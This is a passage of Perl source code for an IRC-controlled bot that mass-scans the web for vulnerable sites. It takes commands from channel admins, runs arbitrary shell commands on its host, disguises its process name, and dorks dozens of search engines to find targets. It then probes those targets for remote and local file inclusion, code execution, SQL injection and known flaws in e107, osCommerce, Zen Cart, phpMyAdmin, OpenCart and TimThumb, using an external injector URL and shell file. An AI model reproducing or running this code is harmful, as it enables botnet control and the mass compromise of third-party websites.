  254.         elsif ($servarg =~ /005/ ) { sendraw("JOIN $channel");sleep(2); }
  255. }
  256. my $line_temp;
  257. while( 1 ) {
  258.     while (!(keys(%irc_servers))) { &connector("abuse\[".(int(rand(99999)))."\]you", "$verbindnaar", "$deurtje"); }
  259.     select(undef, undef, undef, 0.01);
  260.     delete($irc_servers{''}) if (defined($irc_servers{''}));
  261.     my @ready = $sel_client->can_read(0);
  262.     next unless(@ready);
  263.     foreach $fh (@ready) {
  264.         $IRC_cur_socket = $fh;
  265.         $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
  266.         $nread = sysread($fh, $ircmsg, 4096);
  267.         if ($nread == 0) {
  268.             $sel_client->remove($fh);
  269.             $fh->close;
  270.             delete($irc_servers{$fh});
  271.         }
  272.         @lines = split (/\n/, $ircmsg);
  273.         $ircmsg =~ s/\r\n$//;
  274.  
  275.         if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
  276.             my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
  277.                         my $engine = 'Google,Google2,GigaBlast,EuroSeek,Alltheweb,Bing,Mamma,Altavista,Ask,Uol,Yahoo,Yahoo2,Clusty,Gutser,Rediff,Virgilio,Webde,Exalead,Lycos,Hotbot,Aol,Sapo,Duck,Yause,Baidu,Black,Onet,Sizuka,Walla,Demos,Rose,Seznam,Tiscali,Naver,AmiDalLa,BusCaR,KvaSiR,eXciTe,InteRia,SnZ,RambLer,YaNdeX,DooGatE,SoGoU,JoEaNt,TeRrA,YoUdAo,AmFiBi,BiGcLiQuE,DaNcEfLoOr,RaKuTeN,NoVa,NaJdI,GoO,UkSuBmIt,NetSprint,sAol,Lookle,optusZoo,Search66,Arrama,eXciteJP,BigLobe,Clix,SearchCH,Cada';
  278.             if ($path eq $mynick) {
  279.                 if ($msg =~ /^ PING (.*) /) {
  280.                     sendraw("NOTICE $nick : PING $1 ");
  281.                 }
  282.                 if ($msg =~ /^ VERSION /) {
  283.                     sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
  284.                 }
  285.                 if ($msg =~ /^ TIME /) {
  286.                     sendraw("NOTICE $nick : TIME ".$datetime." ");
  287.                 }
  288.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!die") {
  289.                     &shell("$path","kill -9 $$");
  290.                 }
  291.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!killall") {
  292.                     &shell("$path","killall -9 perl");
  293.                 }
  294.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!reset") {
  295.                     sendraw("QUIT :Restarting...");
  296.                 }
  297.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^!pid/) {
  298.                     sendraw($IRC_cur_socket, "PRIVMSG $nick :0,1Fake Process/PID : $fakeproc - $$");
  299.                 }
  300.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
  301.                                         my $url = $1.$lfdtest;
  302.                                         my $cmd = $2;
  303.                                         &cmdlfi($url,$cmd,$nick);
  304.                                 }
  305.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
  306.                                         my $url = $1;
  307.                                         my $cmd = $2;
  308.                                         &cmdxml($url,$cmd,$nick);
  309.                                 }
  310.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
  311.                                         my $url = $1;
  312.                                         my $cmd = $2;
  313.                                         &cmde107($url,$cmd,$nick);
  314.                                 }
  315.            }
  316.             else {
  317.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!die") {
  318.                     &shell("$path","kill -9 $$");
  319.                 }
  320.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!killall") {
  321.                     &shell("$path","killall -9 perl");
  322.                 }
  323.                 if ($path =~ $channel && &isAdmin($nick) && $msg eq "!reset") {
  324.                     sendraw("QUIT :Restarting...");
  325.                 }
  326.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
  327.                     &shell("$path","$1");
  328.                 }
  329.                                 if ($path =~ $channel && &creator($nick) && $msg =~ /^\.my (.*)/) {
  330.                     &shell("$path","$1");
  331.                 }
  332.                                 ##################################################################### HIT
  333.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
  334.                                         my $url = $1.$lfdtest;
  335.                                         my $cmd = $2;
  336.                                         &cmdlfi($url,$cmd,$path);
  337.                                 }
  338.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
  339.                                         my $url = $1;
  340.                                         my $cmd = $2;
  341.                                         &cmdxml($url,$cmd,$path);
  342.                                 }
  343.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^$cmde107\s+(.+?)\s+(.*)/){
  344.                                         my $url = $1;
  345.                                         my $cmd = $2;
  346.                                         &cmde107($url,$cmd,$path);
  347.                                 }
  348.                 ##################################################################### HELP COMMAND
  349.                 if ($path =~ $channel && $msg=~ /^!help/) {
  350.                     my $helplogo = "12(4@0Help12)";
  351.                     &msg("$path","$helplogo 6################################################### ");
  352.                     &msg("$path","$helplogo 6# $cmds{rficmd}\[n\] / $cmds{lficmd}\[n\] / $cmds{lfdcmd} / $cmds{sqlcmd} / $cmds{xmlcmd}\[n\] / $cmds{timcmd}\[n\] / $cmds{zerocmd}\[n\] / $cmds{opcmd} 14»» 12[0bug12] [0dork12] 14«« 6# ");
  353.                     &msg("$path","$helplogo 6# $cmde107 / $cmdlfi / $cmdxml 14»»12 [0target12] [0cmd12] 14««  6# ");
  354.                     &msg("$path","$helplogo 6# $cmds{e107cmd}\[n\] / $cmds{oscocmd}\[n\] / $cmds{cpancmd} / $cmds{zencmd} / $cmds{admcmd} 14»» 12[0dork12] 14||| 6# ");
  355.                     &msg("$path","$helplogo 6################################################### ");
  356.                                         &msg("$path","$helplogo 6# !cinjurl / !ctimurl 12[0url12] change inject url / change timthumb url 14||| 6# ");
  357.                                         &msg("$path","$helplogo 6################################################### ");
  358.                 }
  359.                 if ($path =~ $channel && $msg=~ /^!engine/) {
  360.                     my $enginelogo = "12(4@0Engine12)";
  361.                                         &msg("$path","9$enginelogo 13 Google, Google2, GigaBlast, EuroSeek, Alltheweb, Bing, Mamma, Altavista, Ask, Uol, Yahoo, Yahoo2, Clusty,");
  362.                                         &msg("$path","9$enginelogo 13 Gutser,Rediff, Virgilio, Webde, Exalead, Lycos, Hotbot, Aol, Sapo, Duck, Yause, Baidu, Black, Onet, Sizuka,");
  363.                                         &msg("$path","9$enginelogo 13 Walla, Demos, Rose, Seznam, Tiscali, Naver, AmiDalLa, BusCaR, KvaSiR, eXciTe, InteRia, SnZ, RambLer, YaNdeX,");
  364.                                         &msg("$path","9$enginelogo 13 DooGatE, SoGoU, JoEaNt, TeRrA, YoUdAo, AmFiBi, BiGcLiQuE, DaNcEfLoOr, RaKuTeN, NoVa, NaJdI, GoO, UkSuBmIt,");
  365.                                         &msg("$path","9$enginelogo 13 NetSprint, sAol, Lookle, optusZoo, Search66, Arrama, eXciteJP, BigLobe, Clix, SearchCH, Cada");
  366.                 }
  367.                 if ($path =~ $channel && $msg=~ /^!about/) {
  368.                     my $aboutlogo = "13(8@0About Bot13)";
  369.                     &msg("$path","$aboutlogo 13Fuckin Multi Scanner powerd by THE REAL DUTCH BLEND GREETZ Ha45k! 4,1CraZy8Creation9Zzz ");
  370.                 }
  371.                                
  372.                                 ### change inject url
  373.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^!cinjurl\s+(.*)/) {
  374.                                         my ($url) = ($1);
  375.                                         my $injector  = $url."/bt.php?";
  376.                                         my $botshell  = $url."/sh.txt?";
  377.                                         &msg("$path","12[0Injector Url12] 14»» 9$url 14««");
  378.                                 }
  379.                                 ## change timthumb inject url
  380.                                 if ($path =~ $channel && &isAdmin($nick) && $msg=~ /^!ctimurl\s+(.*)/) {
  381.                                         my ($url) = ($1);
  382.                                         my $blog = $url;
  383.                                         &msg("$path","12[0TimThumb Url12] 14»» 9$url 14««");
  384.                                 }
  385.                                 ### check inject url
  386.                 if ($path =~ $channel && $msg=~ /^!respon/ || $msg=~ /^!id/) {
  387.                     if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  388.                         &msg("$path","12[0Injector Url12] 14»» 9OKE 14«« ");
  389.                     } else {
  390.                         &msg("$path","12[0Injector Url12] 14»» 13ERROR 14«« ");
  391.                     }
  392.                                         if (&timFound($blog,"GIF89")) {
  393.                         &msg("$path","12[0TimThumb Url12] 14»» 9OKE 14«« ");
  394.                     } else {
  395.                         &msg("$path","12[0TimThumb Url12] 14»» 13ERROR 14«« ");
  396.                     }
  397.                 }
  398.                                 ### see fake process name and process pid
  399.                 if ($path =~ $channel && &isAdmin($nick) && $msg =~ /^!pid/) {
  400.                     &notice("$nick","0,1Fake Process/PID : 8$fakeproc - $$");
  401.                 }
  402.  
  403.                 ##################################################################### RFI SCAN
  404.                 if ($path =~ $channel && $msg=~ /^$cmds{rficmd}\[(.+)\]\s+(.+?)\s+(.*)/) {
  405.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  406.                     if (my $pid = fork) { waitpid($pid, 0); }
  407.                     else {
  408.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  409.                                                         if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  410.                                                                 if ($mode =~ "n") { $dork = $drk; }
  411.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  412.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  413.                                                                 else { &notice("$nick","$rfilogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  414.                                                                 &msg("$path","$rfilogo 13Dork :9 ".$dork."");
  415.                                                                 &msg("$path","$rfilogo 13Bugz :9 ".$bug."");
  416.                                                                 &msg("$path","$rfilogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  417.                                                                 &scan_start($path,$bug,$dork,$engine,1);
  418.                                                         } else {
  419.                            &msg("$path","12[0 $nick 12] $rfilogo 4==14E4=15R4=0R4=15O4=14R4== ");
  420.                                                         }
  421.                                                 }
  422.                                                 exit;
  423.                     }
  424.                 }
  425.                                 ##################################################################### RCE SCAN
  426.                 if ($path =~ $channel && $msg=~ /^$cmds{rcecmd}\[(.*)\]\s+(.+?)\s+(.*)/) {
  427.                     my $mode = $1; my $bug = $2; my $drk = $3;
  428.                     if (my $pid = fork) { waitpid($pid, 0); }
  429.                     else {
  430.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  431.                                                         if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  432.                                                                 if ($mode =~ "n") { $dork = $drk; }
  433.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  434.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  435.                                                                 else { &notice("$nick","$rcelogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  436.                                                                 &msg("$path","$rcelogo 13Dork :9 $dork");
  437.                                                                 &msg("$path","$rcelogo 13Bugz :9 $bug");
  438.                                                                 &msg("$path","$rcelogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  439.                                                                 &scan_start($path,$bug,$dork,$engine,17);
  440.                                                         } else {
  441.                                 &msg("$path","12[0 $nick 12] $rcelogo 4==14E4=15R4=0R4=15O4=14R4== ");
  442.                             }
  443.                                                 }      
  444.                                                 exit;
  445.                     }
  446.                 }
  447.                                 ##################################################################### tim RFI SCAN
  448.                 if ($path =~ $channel && $msg=~ /^$cmds{timcmd}\[(.*)\]\s+(.+?)\s+(.*)/) {
  449.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  450.                     if (my $pid = fork) { waitpid($pid, 0); }
  451.                     else {
  452.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  453.                                                         if (&timFound($blog,"GIF89")) {
  454.                                                                 if ($mode =~ "n") { $dork = $drk; }
  455.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  456.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  457.                                                                 else { &notice("$nick","$timlogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  458.                                                                 &msg("$path","$timlogo 13Dork :9 $dork");
  459.                                                                 &msg("$path","$timlogo 13Bugz :9 $bug");
  460.                                                                 &msg("$path","$timlogo 9==14L9=15O9=0A9=0D9=0I9=15N9=14G9== ");
  461.                                                                 &scan_start($path,$bug,$dork,$engine,16);
  462.                                                         } else {
  463.                                 &msg("$path","12[0 $nick 12] $timlogo 4==14E4=15R4=0R4=15O4=14R4== ");
  464.                             }
  465.                         }
  466.                         exit;
  467.                     }
  468.                 }
  469.                                 ##################################################################### LFD SCAN
  470.                 if ($path =~ $channel && $msg=~ /^$cmds{lfdcmd}\s+(.+?)\s+(.*)/) {
  471.                     if (my $pid = fork) { waitpid($pid, 0); }
  472.                     else {
  473.                         if (fork) { exit; } else {
  474.                             my ($bug,$dork) = ($1,$2);
  475.                             &msg("$path","$lfdlogo 12Dork :4 $dork");
  476.                             &msg("$path","$lfdlogo 12Bugz :4 $bug");
  477.                             &msg("$path","$lfdlogo 8==14L8=15O8=0A8=0D8=0I8=15N8=14G8== ");
  478.                             &lfd_start($path,$bug,$dork,$engine,14);
  479.                         }
  480.                         exit;
  481.                     }
  482.                 }
  483.                 ##################################################################### LFIRCE SCAN
  484.                 if ($path =~ $channel && $msg=~ /^$cmds{lficmd}\[(.*)\]\s+(.+?)\s+(.*)/) {
  485.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  486.                     if (my $pid = fork) { waitpid($pid, 0); }
  487.                     else {
  488.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  489.                             if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  490.                                 if ($mode =~ "n") { $dork = $drk; }
  491.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  492.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  493.                                                                 else { &notice("$nick","$lfilogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  494.                                 &msg("$path","$lfilogo 13Dork :9 $dork");
  495.                                 &msg("$path","$lfilogo 13Bugz :9 $bug");
  496.                                 &msg("$path","$lfilogo 8==14L8=15O8=0A8=0D8=0I8=15N8=14G8== ");
  497.                                 &scan_start($path,$bug,$dork,$engine,2);
  498.                             } else {
  499.                                 &msg("$path","12[0 $nick 12] $lfilogo 4==14E4=15R4=0R4=15O4=14R4== ");
  500.                             }
  501.                         }
  502.                         exit;
  503.                     }
  504.                 }
  505.                 ##################################################################### e107 contact.php SCAN
  506.                 if ($path =~ $channel && $msg=~ /^$cmds{e107cmd}\[(.*)\]\s+(.*)/) {
  507.                                         my $mode = $1; my $bug = "contact.php"; my $drk = $2;
  508.                     if (my $pid = fork) { waitpid($pid, 0); }
  509.                     else {
  510.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  511.                             if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  512.                                 if ($mode =~ "n") { $dork = $drk; }
  513.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  514.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  515.                                                                 else { &notice("$nick","$e107logo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  516.                                 &msg("$path","$e107logo 13Dork :9 $dork");
  517.                                 &msg("$path","$e107logo 13Bugz :9 $bug");
  518.                                 &msg("$path","$e107logo 10==14L10=15O10=0A10=0D10=0I10=15N10=14G10== ");
  519.                                 &scan_start($path,$bug,$dork,$engine,3);
  520.                             } else {
  521.                                 &msg("$path","12[0 $nick 12] $e107logo 4==14E4=15R4=0R4=15O4=14R4== ");
  522.                             }
  523.                         }
  524.                         exit;
  525.                     }
  526.                 }
  527.                                 ##################################################################### XML SCAN
  528.                                 if ($path =~ $channel && $msg=~ /^$cmds{xmlcmd}\[(.*)\]\s+(.*?)\s+(.*)/ ) {
  529.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  530.                                         if (my $pid = fork) { waitpid($pid, 0); }
  531.                                         else {
  532.                                                 if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  533.                             if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  534.                                 if ($mode =~ "n") { $dork = $drk; }
  535.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  536.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  537.                                                                 else { &notice("$nick","$xmllogo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  538.                                 &msg("$path","$xmllogo 13Dork :9 $dork");
  539.                                 &msg("$path","$xmllogo 13Bugz :9 $bug");
  540.                                 &msg("$path","$xmllogo 11==14L11=15O11=0A11=0D11=0I11=15N11=14G11== ");
  541.                                 &scan_start($path,$bug,$dork,$engine,4);
  542.                             } else {
  543.                                 &msg("$path","12[0 $nick 12] $xmllogo 4==14E4=15R4=0R4=15O4=14R4== ");
  544.                             }
  545.                         }
  546.                         exit;
  547.                     }
  548.                 }
  549.                 ##################################################################### SQL SCAN
  550.                 if ($path =~ $channel && $msg=~ /^$cmds{sqlcmd}\s+(.+?)\s+(.*)/) {
  551.                     if (my $pid = fork) { waitpid($pid, 0); }
  552.                     else {
  553.                         if (fork) { exit; } else {
  554.                             my ($bug,$dork) = ($1,$2);
  555.                             &msg("$path","$sqllogo 13Dork :9 $dork");
  556.                             &msg("$path","$sqllogo 13Bugz :9 $bug");
  557.                             &msg("$path","$sqllogo 7==14L7=15O7=0A7=0D7=0I7=15N7=14G7== ");
  558.                             &scan_start($path,$bug,$dork,$engine,5);
  559.                         }
  560.                         exit;
  561.                     }
  562.                 }
  563.                 ##################################################################### OSCO SCAN
  564.                 if ($path =~ $channel && $msg=~ /^$cmds{oscocmd}\[(.*)\]\s+(.*)/) {
  565.                                         my $mode = $1; my $bug = "index.php"; my $drk = $2;
  566.                     if (my $pid = fork) { waitpid($pid, 0); }
  567.                     else {
  568.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  569.                             if ($mode =~ "n") { $dork = $drk; }
  570.                                                         elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  571.                                                         elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  572.                                                         else { &notice("$nick","$oscologo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  573.                             &msg("$path","$oscologo 13Dork :9 $dork ");
  574.                                                         &msg("$path","$oscologo 4==14L4=15O4=0A4=0D4=0I4=15N4=14G4== ");
  575.                             &scan_start($path,$bug,$dork,$engine,6);
  576.                         }
  577.                         exit;
  578.                     }
  579.                 }
  580.                 ##################################################################### CPANEL SCAN
  581.                                         if ($path =~ $channel && $msg=~ /^$cmds{cpancmd}\s+(.*)/) {
  582.                                                 if (my $pid = fork) { waitpid($pid, 0); } else {
  583.                                                         if (fork) { exit; } else {
  584.                                                                         my ($bug,$dork) = ("admin/content.php?act=tambahuser",$1);
  585.                                                                         &msg("$path","$cpanlogo 13Dork :9 $dork");
  586.                                                                         &msg("$path","$cpanlogo 7==14L7=15O7=0A7=0D7=0I7=15N7=14G7== ");
  587.                                                                         &scan_start($path,$bug,$dork,$engine,8);
  588.                                                                                                                
  589.                                                         }
  590.                                                         exit;
  591.                                         }
  592.                                 }
  593.                                 if ($path =~ $channel && $msg=~ /^$cmds{cpancmd}\s+(.*)/) {
  594.                                                 if (my $pid = fork) { waitpid($pid, 0); } else {
  595.                                                         if (fork) { exit; } else {
  596.                                                                         my ($bug,$dork) = ("admin/content.php?module=user",$1);
  597.                                                                         &scan_start($path,$bug,$dork,$engine,9);
  598.                                                                                                                
  599.                                                         }
  600.                                                         exit;
  601.                                         }
  602.                                 }
  603.                                 ##################################################################### PhpMyAdmin SCAN
  604.                                 if ($path =~ $channel && $msg=~ /^$cmds{admcmd}\s+(.*)/) {
  605.                     if (my $pid = fork) { waitpid($pid, 0); }
  606.                     else {
  607.                         if (fork) { exit; } else {
  608.                             my ($bug,$dork) = ("phpMyAdmin/config/config.inc.php",$1);
  609.                             &msg("$path","$admlogo 13Dork :9 $dork");
  610.                             &msg("$path","$admlogo 11==14L11=15O11=0A11=0D11=0I11=15N11=14G11==");
  611.                             &scan_start($path,$bug,$dork,$engine,10);
  612.                         }
  613.                         exit;
  614.                     }
  615.                 }
  616.                ##################################################################### OPENCART SCAN
  617.                 if ($path =~ $channel && $msg=~ /^$cmds{opcmd}\s+(.+?)\s+(.*)/) {
  618.                     if (my $pid = fork) { waitpid($pid, 0); }
  619.                     else {
  620.                         if (fork) { exit; } else {
  621.                             my ($bug,$dork) = ($1,$2);
  622.                             &msg("$path","$oplogo 3Dork :4 $dork");
  623.                             &msg("$path","$oplogo 6Bugz :4 $bug");
  624.                             &msg("$path","$oplogo 12Search Engine Loading ...");
  625.                             &scan_start($path,$bug,$dork,$engine,11);
  626.                         }
  627.                         exit;
  628.                     }
  629.                 }
  630.                 ##################################################################### ZEN SCAN
  631.                 if ($path =~ $channel && $msg=~ /^$cmds{zencmd}\s+(.*)/) {
  632.                     if (my $pid = fork) { waitpid($pid, 0); }
  633.                     else {
  634.                         if (fork) { exit; } else {
  635.                             my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
  636.                             &msg("$path","$zenlogo 3Dork :4 $dork");
  637.                             &msg("$path","$zenlogo 12Search Engine Loading ...");
  638.                             &scan_start($path,$bug,$dork,$engine,12);
  639.                         }
  640.                         exit;
  641.                     }
  642.                 }
  643.                 ##################################################################### ZEN SCAN
  644.                 if ($path =~ $channel && $msg=~ /^$cmds{zencmd}\s+(.*)/) {
  645.                     if (my $pid = fork) { waitpid($pid, 0); }
  646.                     else {
  647.                         if (fork) { exit; } else {
  648.                             my ($bug,$dork) = ("admin/record_company.php",$1);
  649.                             &scan_start($path,$bug,$dork,$engine,12);
  650.                         }
  651.                         exit;
  652.                     }
  653.                 }
  654.                                 ##################################################################### zBoard SCAN
  655.                 if ($path =~ $channel && $msg=~ /^$cmds{zerocmd}\[(.*)\]\s+(.*?)\s+(.*)/) {
  656.                                         my $mode = $1; my $bug = $2; my $drk = $3;
  657.                     if (my $pid = fork) { waitpid($pid, 0); }
  658.                     else {
  659.                         if (fork) { exit; } else { $domens = $domen[rand(scalar(@domen))]; $randw = $words[rand(scalar(@words))];
  660.                             if (&isFound($botshell,"pVd5c9pIFv97XeXv0NFm")) {
  661.                                 if ($mode =~ "n") { $dork = $drk; }
  662.                                                                 elsif ($mode =~ "d") { $dork = $drk." +".$domens; }
  663.                                                                 elsif ($mode =~ "w") { $dork = $drk." +".$randw; }
  664.                                                                 else { &notice("$nick","$zerologo 4Wrong scan mode [n] = normal, [d] = with random domains, [w] = with random words"); exit; }
  665.                                 &msg("$path","$zerologo 13Dork :9 $dork");
  666.                                 &msg("$path","$zerologo 13Bugz :9 $bug");
  667.                                 &msg("$path","$zerologo 10==14L10=15O10=0A10=0D10=0I10=15N10=14G10== ");
  668.                                 &scan_start($path,$bug,$dork,$engine,18);
  669.                             } else {
  670.                                 &msg("$path","12[0 $nick 12] $zerologo 4==14E4=15R4=0R4=15O4=14R4== ");
  671.                             }
  672.                         }
  673.                         exit;
  674.                     }
  675.                 }
  676.                                 #####################################################################
  677.             }
  678.         }
  679.  
  680.         for(my $c=0; $c<= $#lines; $c++) {
  681.             $line = $lines[$c];
  682.             $line = $line_temp.$line if ($line_temp);
  683.             $line_temp = '';
  684.             $line =~ s/\r$//;
  685.             unless ($c == $#lines) {
  686.                 &parse("$line");
  687.             } else {
  688.                 if ($#lines == 0) {
  689.                     &parse("$line");
  690.                 } elsif ($lines[$c] =~ /\r$/) {
  691.                     &parse("$line");
  692.                 } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  693.                     &parse("$line");
  694.                 } else {
  695.                     $line_temp = $line;
  696.                 }
  697.             }
  698.         }
  699.     }
  700. }
  701.  
  702. #########################################
  703. sub type () {
  704. my ($chan,$bug,$dork,$engine,$type) = @_;
  705.         if ($type == 1){$type=&rfi($chan,$bug,$dork,$engine);}
  706.         elsif ($type == 2){$type=&lfi($chan,$bug,$dork,$engine);}
  707.         elsif ($type == 3){$type=&e107($chan,$bug,$dork,$engine);}
  708.         elsif ($type == 4){$type=&xml($chan,$bug,$dork,$engine);}
  709.         elsif ($type == 5){$type=&sql($chan,$bug,$dork,$engine);}
  710.         elsif ($type == 6){$type=&oscommerce($chan,$bug,$dork,$engine);}
  711.         #elsif ($type == 7){$type=&osco2($chan,$bug,$dork,$engine);}
  712.         elsif ($type == 8){$type=&cpanel($chan,$bug,$dork,$engine);}
  713.         elsif ($type == 9){$type=&cpanel2($chan,$bug,$dork,$engine);}
  714.         elsif ($type == 10){$type=&adm($chan,$bug,$dork,$engine);}
  715.         elsif ($type == 11){$type=&op($chan,$bug,$dork,$engine);}
  716.         elsif ($type == 12){$type=&zen($chan,$bug,$dork,$engine);}
  717.         #elsif ($type == 13){$type=&osco3($chan,$bug,$dork,$engine);}
  718.         elsif ($type == 14){$type=&lfd($chan,$bug,$dork,$engine);}
  719.         #elsif ($type == 15){$type=&osco4($chan,$bug,$dork,$engine);}
  720.         elsif ($type == 16){$type=&timrfi($chan,$bug,$dork,$engine);}
  721.         elsif ($type == 17){$type=&rce($chan,$bug,$dork,$engine);}
  722.         elsif ($type == 18){$type=&zboard($chan,$bug,$dork,$engine);}
  723. }
  724. sub scan_start() {
  725. my ($chan,$bug,$dork,$engine,$type) = @_;
  726.     if ($engine =~ /google/i) {
  727.         if (my $pid = fork) { waitpid($pid, 0); }
  728.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Google",$type); } exit; }
  729.     }
  730.     if ($engine =~ /google2/i) {
  731.         if ($pid = fork) { waitpid($pid, 0); }
  732.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Google2",$type); } exit; }
  733.     }
  734.         if ($engine =~ /gigablast/i) {
  735.         if ($pid = fork) { waitpid($pid, 0); }
  736.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GigaBlast",$type); } exit; }
  737.     }
  738.         if ($engine =~ /euroseek/i) {
  739.         if ($pid = fork) { waitpid($pid, 0); }
  740.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"EuroSeek",$type); } exit; }
  741.     }
  742.         if ($engine =~ /alltheweb/i) {
  743.         if ($pid = fork) { waitpid($pid, 0); }
  744.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Alltheweb",$type); } exit; }
  745.     }
  746.     if ($engine =~ /bing/i) {
  747.         if ($pid = fork) { waitpid($pid, 0); }
  748.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bing",$type); } exit; }
  749.     }
  750.     if ($engine =~ /altavista/i) {
  751.         if ($pid = fork) { waitpid($pid, 0); }
  752.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Altavista",$type); } exit; }
  753.     }
  754.     if ($engine =~ /ask/i) {
  755.         if ($pid = fork) { waitpid($pid, 0); }
  756.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ask",$type); } exit; }
  757.     }
  758.     if ($engine =~ /uol/i) {
  759.         if ($pid = fork) { waitpid($pid, 0); }
  760.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uol",$type); } exit; }
  761.     }
  762.     if ($engine =~ /yahoo/i) {
  763.         if ($pid = fork) { waitpid($pid, 0); }
  764.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yahoo",$type); } exit; }
  765.     }
  766.         if ($engine =~ /yahoo2/i) {
  767.         if ($pid = fork) { waitpid($pid, 0); }
  768.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yahoo2",$type); } exit; }
  769.     }
  770.     if ($engine =~ /clusty/i) {
  771.         if ($pid = fork) { waitpid($pid, 0); }
  772.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Clusty",$type); } exit; }
  773.     }
  774.     if ($engine =~ /gutser/i) {
  775.         if ($pid = fork) { waitpid($pid, 0); }
  776.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Gutser",$type); } exit; }
  777.     }
  778.     if ($engine =~ /rediff/i) {
  779.         if ($pid = fork) { waitpid($pid, 0); }
  780.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Rediff",$type); } exit; }
  781.     }
  782.         if ($engine =~ /mamma/i) {
  783.         if ($pid = fork) { waitpid($pid, 0); }
  784.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mamma",$type); } exit; }
  785.     }
  786.     if ($engine =~ /virgilio/i) {
  787.         if ($pid = fork) { waitpid($pid, 0); }
  788.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Virgilio",$type); } exit; }
  789.     }
  790.     if ($engine =~ /webde/i) {
  791.         if ($pid = fork) { waitpid($pid, 0); }
  792.         else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Webde",$type); } exit; }
  793.     }
  794.     if ($engine =~ /exalead/i) {
  795.         if ($pid = fork) { waitpid($pid, 0); }
